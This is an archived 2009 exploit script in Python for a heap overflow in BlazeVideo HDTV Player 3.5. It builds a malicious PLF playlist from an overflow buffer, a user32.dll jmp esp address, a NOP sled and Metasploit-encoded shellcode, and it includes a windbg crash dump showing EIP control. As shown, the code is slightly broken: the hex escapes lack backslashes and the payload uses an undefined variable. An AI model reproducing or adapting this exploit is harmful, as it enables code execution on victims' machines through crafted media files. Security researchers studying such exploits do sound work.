blazehdtv-hof.txt
Posted on 03 February 2009
#!/usr/bin/python # # Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit # # Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV # Player software, combining HDTV playback, FM receiving, video record and DVD playback # functions. You can make advantage of PC monitor's high resolution, watch, record, playback # high definition HDTV program or teletext broadcast program. # # Product web page: http://www.blazevideo.com/hdtv-player/index.htm # # Tested on Microsoft Windows XP Professional SP2 (English) # # ------------------------------------windbg------------------------------------ # # (620.d74): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001 # eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 # 43434343 ?? ??? # #-------------------------------------------------------------------------------- # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # liquidworm [t00t] gmail [w00t] com # # http://www.zeroscience.org/ # # 03.01.2009 # print "--------------------------------------------------------------------------" print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit " print " by LiquidWorm [liquidworm[t00t]gmail.com] - 2009 " print "--------------------------------------------------------------------------" buffer = "x41" * 260 eip = "xc0x25x49x7e" #jmp esp user32.dll nop = "x90" * 15 # win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com shellcode = ( "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x51x5ax48x6ax65" "x58x30x42x31x50x42x41x6bx41x41x75x32x41x42x32x42" "x41x30x42x41x41x58x38x41x42x50x75x39x79x6bx4cx4a" "x48x47x34x43x30x45x50x57x70x4cx4bx71x55x77x4cx4c" "x4bx71x6cx37x75x30x78x75x51x78x6fx4cx4bx52x6fx32" "x38x4cx4bx63x6fx45x70x55x51x5ax4bx31x59x6cx4bx44" "x74x6cx4bx55x51x4ax4ex76x51x49x50x6dx49x4cx6cx4e" "x64x6fx30x30x74x43x37x7ax61x59x5ax36x6dx46x61x6a" "x62x58x6bx7ax54x45x6bx76x34x47x54x64x44x53x45x79" "x75x4cx4bx63x6fx51x34x67x71x4ax4bx50x66x4cx4bx76" "x6cx30x4bx4cx4bx43x6fx67x6cx34x41x58x6bx6ex6bx75" "x4cx6cx4bx37x71x38x6bx6cx49x63x6cx54x64x44x44x79" "x53x50x31x69x50x63x54x4cx4bx63x70x34x70x4bx35x4f" "x30x53x48x56x6cx6ex6bx71x50x76x6cx4cx4bx34x30x45" "x4cx4cx6dx4ex6bx50x68x55x58x5ax4bx54x49x4cx4bx6f" "x70x4ex50x55x50x63x30x75x50x4cx4bx72x48x55x6cx71" "x4fx45x61x39x66x41x70x72x76x4fx79x6bx48x4dx53x4f" "x30x73x4bx50x50x50x68x6ax4fx48x4ex6dx30x43x50x62" "x48x6fx68x4bx4ex4fx7ax74x4ex46x37x39x6fx69x77x41" "x63x50x6fx70x6cx75x50x65" ) payload = garbage + eip + nop + shellcode + nop try: out_file = open("Groundhog_Day.plf",'w') out_file.write(payload) out_file.close() raw_input(" [*] Evil playlist successfully created. Press any key to continue...") except: print "Oops!"
